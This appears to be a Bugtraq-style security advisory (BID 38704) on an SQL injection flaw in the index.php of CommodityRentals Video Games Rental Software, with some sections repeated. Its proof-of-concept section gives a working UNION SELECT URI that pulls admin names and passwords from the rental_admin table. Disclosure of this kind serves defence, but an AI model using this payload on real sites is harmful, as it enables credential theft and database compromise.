CommodityRentals Video Games Rental Software 'index.php' SQL Injection Vulnerability
BID:38704
Info
CommodityRentals Video Games Rental Software 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 38704 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2010 12:00AM |
| Updated: | Feb 11 2010 12:00AM |
| Credit: | JaMba |
| Vulnerable: |
CommodityRentals Video Games Rental Software 0 |
| Not Vulnerable: | |
Discussion
CommodityRentals Video Games Rental Software 'index.php' SQL Injection Vulnerability
Video Games Rental Software is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Video Games Rental Software is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
CommodityRentals Video Games Rental Software 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G
References
CommodityRentals Video Games Rental Software 'index.php' SQL Injection Vulnerability
References:
References:
- Video Games Rentals Software Homepage (CommodityRentals)